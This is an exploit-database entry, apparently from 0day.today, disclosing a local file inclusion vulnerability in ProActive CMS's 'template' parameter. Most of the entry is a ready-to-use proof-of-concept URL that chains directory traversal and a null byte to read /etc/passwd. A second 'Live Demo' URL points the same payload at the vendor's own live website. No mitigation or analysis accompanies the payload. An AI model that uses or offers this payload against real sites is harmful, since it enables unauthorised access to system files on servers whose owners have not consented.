id: 3691
date: 09/17/2008
title: ProActive CMS (template) Local File Inclusion Vulnerability
author: r45c4l
cves: 

===========================================================
ProActive CMS (template) Local File Inclusion Vulnerability
===========================================================


################################################################ 
# 
# Title: ProActive CMS LFI 

#
# Vendor: http://www.proactivecms.com/

# 
#
###########################################################
#
# d0rk:n/a
#
###########################################################
 
     POC:- http://www.site.com/index.php?template=../../../../../../../../../../../../../etc/passwd%00
	

     
     
     Live Demo: 
	http://www.proactivecms.com/index.php?template=../../../../../../../../../../../../../etc/passwd%00

     

###########################################################
#
#  Bug discovered : 18 Sep.2008
###########################################################




#  0day.today [2023-03-24]  #